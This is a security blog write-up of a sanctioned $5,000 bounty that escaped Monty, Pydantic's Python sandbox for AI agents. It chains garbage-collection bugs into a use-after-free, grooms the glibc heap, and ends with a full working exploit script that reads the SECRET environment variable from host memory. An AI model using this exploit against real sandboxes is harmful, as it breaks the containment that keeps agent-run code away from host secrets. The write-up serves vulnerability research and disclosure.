Overview
Pwning Pydantic's Monty: A $5K Sandbox Escape

Pwning Pydantic's Monty: A $5K Sandbox Escape

Pydantic offered $5,000 to escape Monty, their Rust-built Python sandbox for AI agents. We chained two GC bugs into a use-after-free and walked away with the bounty.

May 7, 2026
16 min read
index

On April 20th Pydantic put up a $5,000 challenge for the first person to escape Monty, their custom Python interpreter and AI agent sandbox.

It was a pretty special bounty program, in that it was structured like a CTF challenge: read the flag in /app/secret.txt (or the SECRET environment variable). The challenge is black-box, meaning the server-side setup is completely unknown to us. We are only given an API to submit code to be run in the Python sandbox and a public Logfire instance to review our submissions.

Our AI agent discovered the underlying vulnerability and was able to reproduce locally; from there we spent a few hours turning the primitive into a working sandbox escape against the live environment. We were the first to submit a working escape and claim the $5,000 bounty.

We think a skilled operator could have found this manually, or with help from a general-purpose coding assistant like Claude Code, but with a lot more time and effort. As this was a competition, being able to discover the bug quickly gave us a strong advantage.

Pydantic published their own writeup of the vulnerability here.

This exploit was written for Monty version 0.0.16

The Vulnerability

A classic bug that appears in garbage-collected languages is the proper tracking of live objects. In this case the interpreter defines a few sources of garbage collection “roots”. Each root object is walked to locate any referenced child objects, marking all encountered heap objects as “live”. This sweep is performed recursively until all reachable objects have been searched and marked appropriately. Normally this garbage collection process would be perfectly fine, as long as the proper garbage collection roots are supplied to let the recursive walk mark all live objects.

As you can probably guess, the interpreter had a bug that allowed live objects to be hidden from the garbage collection sweep, resulting in a use-after-free vulnerability. The interpreter has a few garbage collection roots: the current interpreter stack, the globals array, the JSON object cache, and the exception stack. The first bug materializes in how the interpreter handles builtin method calls. When non-builtin functions are called the interpreter collects all the arguments passed to the function and pushes them all onto the interpreter stack, ensuring that the arguments will be picked up by the garbage collection sweep. However builtin functions are handled differently. Before invoking a builtin function the interpreter would first pop all of the arguments from the interpreter stack, meaning that if the only reference to an argument was through the interpreter stack, it would now be marked as “dead” by the garbage collection sweep and freed in future garbage collection cycles.

Here is a minimal PoC:

nogc = []
def trigger(item):
if item == 0:
for i in range(100000):
nogc.append([5, 5, 5])
print(item)
return False
filter(trigger, [0, 1])
Terminal window
python3 run.py ./poc_builtin_uaf.py
0
5
5
thread '<unnamed>' (20392697) panicked at crates/monty/src/heap.rs:945:39:
Heap::dec_ref: object already freed
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

When this code is run, the sequence printed is 0, 5, 5 instead of the expected 0, 1. Since the garbage collection sweep is blind to arguments passed to builtin functions, the [0, 1] that is being filtered is freed during the forced garbage collection cycle and replaced with a list of just [5, 5, 5].

The second bug is also garbage collection related. Monty supports two methods of heap object access, HeapId or HeapRead. With a HeapId the heap must be queried using the HeapId to look up the object on every access. With a HeapRead it stashes a pointer to the heap object directly and increments the readers reference count for that heap object. Heap objects with a non-zero readers count should not be freed since somewhere a HeapRead object is still referencing the underlying object. Seems fine right? Except the garbage collection sweep wasn’t actually checking heap object readers reference count, it was only relying on object reachability.

Combined, these two bugs allow for a use-after-free of a Rust heap object and subsequent type confusion.

nogc = []
def trigger(item):
if item == 0:
for i in range(100000):
nogc.append([5, 5, 5])
return 0
[0, 1, 2].sort(key=trigger)
Terminal window
python3 run.py ./poc_sort_uaf.py
thread '<unnamed>' (20386150) panicked at crates/monty/src/heap.rs:949:17:
Heap::dec_ref: cannot free HeapId(2) with 18446744073709551615 active reader(s)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
thread '<unnamed>' (20386150) panicked at crates/monty/src/heap.rs:949:17:
Heap::dec_ref: cannot free HeapId(2) with 18446744073709551615 active reader(s)
stack backtrace:
0: 0x105ee9a70 - <unknown>
1: 0x105d5f600 - <unknown>
2: 0x105ee7db0 - <unknown>
3: 0x105ee7a00 - <unknown>
4: 0x105f08788 - <unknown>
5: 0x105f08744 - <unknown>
6: 0x105f08c8c - <unknown>
7: 0x1063acfb8 - _PyInit__monty
8: 0x105cab038 - <unknown>
9: 0x105c9df90 - <unknown>
10: 0x105d47918 - <unknown>
11: 0x105d42cec - <unknown>
12: 0x105ca2404 - <unknown>
13: 0x105ca29a8 - <unknown>
14: 0x10499c7c4 - _method_vectorcall_FASTCALL_KEYWORDS
15: 0x104990598 - _PyObject_Vectorcall
16: 0x104ab92e8 - __PyEval_EvalFrameDefault
17: 0x104ab75a4 - _PyEval_EvalCode
18: 0x104b27d04 - _run_eval_code_obj
19: 0x104b2774c - _run_mod
20: 0x104b25df4 - _pyrun_file
21: 0x104b25130 - __PyRun_SimpleFileObject
22: 0x104b24d68 - __PyRun_AnyFileObject
23: 0x104b4c9e0 - _pymain_run_file_obj
24: 0x104b4c68c - _pymain_run_file
25: 0x104b4b8fc - _Py_RunMain
26: 0x104b4bef8 - _pymain_main
27: 0x104b4bf98 - _Py_BytesMain
thread '<unnamed>' (20386150) panicked at /rustc/59807616e1fa2540724bfbac14d7976d7e4a3860/library/core/src/panicking.rs:233:5:
panic in a destructor during cleanup
thread caused non-unwinding panic. aborting.
[1] 41133 abort python3 run.py ./poc_sort_uaf.py

Exploitation Primitives

Now this is where we must leave the warm comfort of our high-level languages and enter the terrifying realm of pointers and native code.

The interpreter heap consists of a Vec<Page>, with each Page holding 256 Slot structures, with the HeapData enum embedded directly into the Slot struct.

const PAGE_SIZE: usize = 256;
type Page = Box<[Slot; PAGE_SIZE]>;
type Slot = MaybeUninit<Option<HeapEntry>>;
pub struct HeapEntry {
refcount: Cell<usize>,
/// Number of active `HeapRead` pointers into this entry's data.
///
/// Incremented when `HeapReader::read` creates a `HeapRead`, decremented when
/// the `HeapRead` is dropped. `dec_ref` panics if it would free an entry that
/// still has active readers — this guarantees that `HeapRead` pointers remain
/// valid for as long as they exist.
#[serde(skip, default)] // should always be 0 during serde ops
readers: Cell<usize>,
/// The payload data
data: UnsafeHeapData,
/// Current hashing status / cached hash value
hash_state: HashState,
}

When HeapRead grabs a raw pointer reference to the heap object it will be a pointer to the UnsafeHeapData field of one of these slots.

pub struct HeapRead<'a, T: ?Sized> {
/// pointer to the data field of HeapEntry, past the enum discriminant
value: NonNull<T>,
/// pointer to the readers field of HeapEntry
readers: NonNull<Cell<usize>>,
borrow: PhantomData<fn(&'a T) -> &'a T>,
}

The primitive that we can build from this is an out-of-bounds heap read/write due to type confusion. The do_list_sort function assumes that the HeapData referenced by the &mut HeapRead<'h, List> is an actual List, but since we can replace the list with another object using our use-after-free vulnerability it will interpret the new HeapData as if it were a List.

This is how the List structure is defined:

pub(crate) struct List {
items: Vec<Value>,
contains_refs: bool,
}

This is how the structure is laid out in memory:

/* offset */
struct monty::types::list::List {
/* 0x00 */ items: alloc::vec::Vec<monty::value::Value, alloc::alloc::Global> {
/* 0x00 */ cap: core::num::niche_types::UsizeNoHighBit,
/* 0x08 */ ptr: core::ptr::unique::Unique<u8>,
/* 0x10 */ len: usize,
},
/* 0x18 */ contains_refs: bool,
/* total size (bytes): 0x20 */
}

At this point in the exploit we don’t have any heap leaks and the interpreter doesn’t seem to leak any host addresses like normal Python (e.g. id(x)). So we can’t fake a valid pointer field, but we can allocate a new object with the same general structure as a List. A prime candidate for this is the Bytes structure:

pub(crate) struct Bytes(Vec<u8>);

Bytes memory layout:

/* offset */
struct monty::types::bytes::Bytes (
/* 0x00 */ alloc::vec::Vec<u8, alloc::alloc::Global> {
/* 0x00 */ cap: core::num::niche_types::UsizeNoHighBit,
/* 0x08 */ ptr: core::ptr::unique::Unique<u8>,
/* 0x10 */ len: usize,
},
/* total size (bytes): 0x20 */
)

Both structures begin with a Vec<T>, however Bytes is Vec<u8> and List is Vec<Value>. The size of the Value type is 0x10 bytes while the size of the u8 type is 0x01 bytes. The do_list_sort assumes the object is List -> Vec<Value> so it will index the vector using a stride of 0x10 instead of the correct stride of 0x01, giving an out-of-bounds access primitive.

This is how the actual list sorting is implemented:

pub fn apply_permutation<T>(items: &mut [T], indices: &mut [usize]) {
for i in 0..items.len() {
if indices[i] == i {
continue;
}
let mut current = i;
loop {
let target = indices[current];
indices[current] = current;
if target == i {
break;
}
items.swap(current, target);
current = target;
}
}
}

apply_permutation will selectively move values around based on the indices array which we have full control over. Allowing us to selectively swap values in and out of the Bytes vector into out-of-bounds memory, yielding an out-of-bounds heap read/write primitive.

Here is a shortened version of the do_list_sort function. The list argument is freed by our forced garbage collection cycle in the last iteration of computing compare_values and then passed into apply_permutation at the very end:

fn do_list_sort<'h>(
list: &mut HeapRead<'h, List>,
args: ArgValues,
vm: &mut VM<'h, '_, impl ResourceTracker>,
) -> Result<(), RunError> {
/* -- snip -- */
let compare_values = if let Some(f) = key_fn {
let len = list.get(vm.heap).items.len();
let keys: Vec<Value> = Vec::with_capacity(len);
let mut keys_guard = HeapGuard::new(keys, vm);
let (keys, vm) = keys_guard.as_parts_mut();
for i in 0..len {
let item = list.get(vm.heap).items[i].clone_with_heap(vm);
/// !!!
/// custom key function is evaluated here
/// !!!
keys.push(vm.evaluate_function("sorted() key argument", f, ArgValues::One(item))?);
}
keys_guard.into_inner()
} else {
/* -- snip -- */
};
defer_drop!(compare_values, vm);
let len = compare_values.len();
let mut indices: Vec<usize> = (0..len).collect();
sort_indices(&mut indices, compare_values, reverse, vm)?;
/// !!!
/// performs the actual sorting
/// !!!
apply_permutation(&mut list.get_mut(vm.heap).items, &mut indices);
Ok(())
}

The first thing that must be done is to prevent the program from fatally panicking. When [list type].sort(...) is called it is invoked through this code path in the interpreter, which will decrement the reference once the object goes out of scope.

fn call_attr(&mut self, obj: Value, name_id: StringId, args: ArgValues) -> Result<CallResult, RunError> {
let this = self;
let attr = EitherStr::Interned(name_id);
match obj {
Value::Ref(heap_id) => {
defer_drop!(obj, this);
this.heap.read(heap_id).py_call_attr(heap_id, this, &attr, args)
}

This assertion is hit if the reference count hits zero which causes the program to panic if an object will be freed through a zero reference count with non-zero readers.

pub fn dec_ref(&mut self, id: HeapId) {
let mut current_id = id;
let mut work_stack = Vec::new();
loop {
let slot = self.entries.get_mut(current_id.index());
let entry = slot.as_mut().expect("Heap::dec_ref: object already freed");
if entry.refcount.get() > 1 {
entry.refcount.update(|r| r - 1);
} else {
assert!(
entry.readers.get() == 0,
"Heap::dec_ref: cannot free HeapId({}) with {} active reader(s)",
current_id.index(),
entry.readers.get(),
);

The program is currently crashing because as shown by the PoCs above, once the object is freed it will immediately be replaced by a new allocated list object with a readers count of zero. The drop method of HeapRead indiscriminately decrements the readers field causing the zero readers count to overflow to 18446744073709551615 (0xFFFFFFFFFFFFFFFF), eventually dec_ref is invoked once call_attr returns and the program panics.

impl<T: ?Sized> Drop for HeapRead<'_, T> {
fn drop(&mut self) {
let cell = unsafe { self.readers.as_ref() };
cell.set(cell.get() - 1);
}
}

The solution to this problem is to use our newly discovered out-of-bounds heap write primitive (:P). What if we simply arranged the heap such that the Bytes vector memory is allocated before the Bytes slot page on the heap? Then we are able to edit the readers field to be non-zero and avoid a fatal panic.

Remote OSINT

There is one issue with this, due to the black-box nature of the challenge, we don’t actually know what allocator is used on remote, or the exact version of Monty, or the exact Python 3 version. For the Monty version we can just assume the latest release version 0.0.16. For Python I did a bit of snooping around in their public Logfire instance and discovered this string: 3.14.4 (main, Apr 8 2026, 17:38:23) [GCC 14.2.0] (printed when invoking an interactive Python session). I assumed they had some sort of containerization on the backend so I tested different Dockerfiles to see what container they were using for this challenge. Eventually I found this:

Terminal window
root@a65b7b7f161c:/share# python3
Python 3.14.4 (main, Apr 8 2026, 17:38:21) [GCC 14.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

A stock python:3.14.4 container with Docker yields almost the exact same version string off by two seconds.

We still don’t exactly know how their code is running the Monty sandbox on the backend, but now we can set up a local environment that should match the remote environment almost perfectly. It also tells us that the remote allocator is the glibc allocator.

Heap Feng Shui

Before the interpreter runs any code these are the heap statistics on my local machine:

Found 136 valid chunks in tcache
Found 0 valid chunks in fastbins
Found 1 valid chunks in unsorted bin
Found 80 valid chunks in 26 small bins
Found 21 valid chunks in 16 large bins

The heap is already relatively messy and it might be even worse on remote. In order to get a consistent heap layout we have to drain the heap of larger chunks that the allocator might split up to serve smaller allocations, since we have no control over the relative heap locations of the old chunks.

By spraying byte objects of exact sizes we can fairly consistently drain the heap of the larger chunks:

packing = []
for i in range(256 + 180):
packing.append([0x1337 + i])
amount = 0x900
lowmem = []
for i in range(32):
packing.append(b"B" * 0x3f0)
packing.append(b"A" * 0x3d8)
lowmem.append(b"Z" * 0x420); packing.append(b"A" * 0x3d8)
lowmem.append(b"Z" * 0x820); packing.append(b"A" * 0x3d8)

After this code is run:

Found 130 valid chunks in tcache
Found 0 valid chunks in fastbins
Found 1 valid chunks in unsorted bin
Found 21 valid chunks in 16 small bins
Found 1 valid chunks in 1 large bins

Once the larger chunks are gone the heap will be forced to use linear memory to serve new allocations. As long as our new allocations are larger than the rest of the freed chunks on the heap linear memory will be used and guarantees consistent relative object offsets.

# amount is 0x900
packing.append(b"N" * amount)
lowmem.append(b"Z" * amount)
packing.append(b"A" * 0x3d8)
for i in range(100):
packing.append([0x1337 + i])

The 0x910 sized chunk is our b"Z" * amount byte object and the 0xc010 sized chunk is the heap Page that will contain the victim List object. The 0x3e0 sized chunk is there to prevent coalescing of large free chunks.

Chunk(base=0x6435aa781e90, addr=0x6435aa781ea0, size=0x910, flags=PREV_INUSE)
Chunk(base=0x6435aa7827a0, addr=0x6435aa7827b0, size=0x3e0, flags=PREV_INUSE)
Chunk(base=0x6435aa782b80, addr=0x6435aa782b90, size=0xc010, flags=PREV_INUSE)

As long as this relative layout of objects is created on the heap we can entirely disregard the state of the rest of the heap.

Exploitation (The Fun Part)

offset = 0x3e
x = 0
gc = []
def keygen(key):
global x, lowmem
state = x
x += 1
if state == amount - 1:
print("forcing gc")
for i in range(99454):
gc.append([])
lowmem.clear()
gc.append([b"A" * 0x10])
x = b"\x02\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\x0f\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0".ljust(amount, b"B")
print("ok")
if state == 0:
return 0x580
elif state == 0x580:
return 0
elif state == 1:
return 0x93+offset
elif state == 0x93+offset:
return 1
elif state == 2:
return 0x94+offset
elif state == 0x94+offset:
return 2
elif state == 3:
return 0x91+offset
elif state == 0x91+offset:
return 3
elif state == 4:
return 0x92+offset
elif state == 0x92+offset:
return 4
else:
return state
([0] * amount).sort(key=keygen)

On the last iteration of the list indices generation we allocate an exact number of lists to trigger a garbage collection cycle, freeing the list object referenced by the sort. The lowmem list is cleared right before allocating the final list so the original 0x910 sized b"Z" * amount byte object will be garbage collected and replaced with the new x = ... bytes object. The heap slot previously used by the victim List object is now occupied by the newly created bytes object with the backing memory of the bytes object at a stable relative offset from the heap slot.

/* byte object backing memory */
Chunk(base=0x6435aa781e90, addr=0x6435aa781ea0, size=0x910, flags=PREV_INUSE)
/* padding chunk */
Chunk(base=0x6435aa7827a0, addr=0x6435aa7827b0, size=0x3e0, flags=PREV_INUSE)
/* byte object slot in this Page */
Chunk(base=0x6435aa782b80, addr=0x6435aa782b90, size=0xc010, flags=PREV_INUSE)

With this setup exploitation is simple. The first swap overwrite the bytes object reference count to avoid the non-zero readers panic in dec_ref. The rest of the swaps create a fake bytes object in the same Page as the bytes object. Before this we sprayed list objects into the packing array to guarantee that this page is filled with list objects. The fake bytes object has a pointer field of 0 and a length of (1<<60)-1. Indexing this fake byte object with a memory address allows reading the memory at that address since the base pointer is 0 and the length covers the entire userland address space. The last step is to acquire a heap leak, which is done by swapping a heap pointer from a random list object in the heap Page into the bytes object which can be parsed out later.

Now all that is left is to search for the corrupted list object in the packing array by iterating until the corrupted length is found:

def qword(b, o):
return b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24) | (b[o + 4] << 32) | (b[o + 5] << 40) | (b[o + 6] << 48) | (b[o + 7] << 56)
first = qword(x, 0)
print("bad", first)
if first != 1:
raise Exception("good")
print(x[:32])
print(hex(qword(x, 16)))
fake = None
for i in range(1, 101):
l = len(packing[-i])
print(l)
if l != 1:
fake = packing[-i]
break
if fake == None:
raise Exception("fake")

Finally using the heap leak to scan for stack pointers and enumerating the stack for the SECRET= environment variable. The program is terminated early with a raise Exception(...) to avoid interpreter panics related to the corrupted state of the heap.

o = qword(x, 0x20)
print(hex(o))
while True:
if fake[o + 5] == 0x7f:
break
o += 8
leak = qword(fake, o)
print(hex(leak))
while True:
if fake[leak - 1] == 0 and fake[leak] == 0x53 and fake[leak + 1] == 0x45 and fake[leak + 2] == 0x43 and fake[leak + 3] == 0x52 and fake[leak + 4] == 0x45 and fake[leak + 5] == 0x54 and fake[leak + 6] == 0x3d:
break
leak += 1
print(hex(leak))
start = leak
while fake[leak] != 0:
leak += 1
raise Exception(fake[start:leak].decode())

The exploit isn’t perfect by any means. The initial heap setup can be improved, the hardcoded list allocation count to force garbage collection needs to be specifically tuned, and assumptions are made above the initial program state. But it’s good enough to exploit and leak the secret value from their honeypot.

SECRET=4HIPD4rQ1C2FeF946Um3WUqHKhiB1YzrNpixKs5SeXerwLodBc

Full Exploit Script

packing = []
for i in range(256 + 180):
packing.append([0x1337 + i])
amount = 0x900
lowmem = []
for i in range(32):
packing.append(b"B" * 0x3f0)
packing.append(b"A" * 0x3d8)
lowmem.append(b"Z" * 0x420); packing.append(b"A" * 0x3d8)
lowmem.append(b"Z" * 0x820); packing.append(b"A" * 0x3d8)
packing.append(b"N" * amount)
lowmem.append(b"Z" * amount)
packing.append(b"A" * 0x3d8)
for i in range(100):
packing.append([0x1337 + i])
offset = 0x3e
x = 0
gc = []
def keygen(key):
global x, lowmem
state = x
x += 1
if state == amount - 1:
print("forcing gc")
for i in range(99454):
gc.append([])
lowmem.clear()
gc.append([b"A" * 0x10])
x = b"\x02\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\x0f\x00\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\x80\x01\0\0\0\0\0\0\0\x00\0\0\0\0\0\0\0".ljust(amount, b"B")
print("ok")
if state == 0:
return 0x580
elif state == 0x580:
return 0
elif state == 1:
return 0x93+offset
elif state == 0x93+offset:
return 1
elif state == 2:
return 0x94+offset
elif state == 0x94+offset:
return 2
elif state == 3:
return 0x91+offset
elif state == 0x91+offset:
return 3
elif state == 4:
return 0x92+offset
elif state == 0x92+offset:
return 4
else:
return state
([0] * amount).sort(key=keygen)
print("lmfao")
def qword(b, o):
return b[o] | (b[o + 1] << 8) | (b[o + 2] << 16) | (b[o + 3] << 24) | (b[o + 4] << 32) | (b[o + 5] << 40) | (b[o + 6] << 48) | (b[o + 7] << 56)
first = qword(x, 0)
print("bad", first)
if first != 1:
raise Exception("good")
print(x[:32])
print(hex(qword(x, 16)))
fake = None
for i in range(1, 101):
l = len(packing[-i])
print(l)
if l != 1:
fake = packing[-i]
break
if fake == None:
raise Exception("fake")
o = qword(x, 0x20)
print(hex(o))
while True:
if fake[o + 5] == 0x7f and fake[o + 4] >= 0xd0 and fake[o + 3] != 0:
break
o += 8
leak = qword(fake, o)
print(hex(leak))
while True:
if fake[leak - 1] == 0 and fake[leak] == 0x53 and fake[leak + 1] == 0x45 and fake[leak + 2] == 0x43 and fake[leak + 3] == 0x52 and fake[leak + 4] == 0x45 and fake[leak + 5] == 0x54 and fake[leak + 6] == 0x3d:
break
leak += 1
print(hex(leak))
start = leak
while fake[leak] != 0:
leak += 1
secret = fake[start:leak].decode()
print(secret)
raise Exception(secret)

Owen Kwan (@unvariantwinter) is an intern at Veria Labs. Veria was founded by members of .;,;., the #1 US CTF team.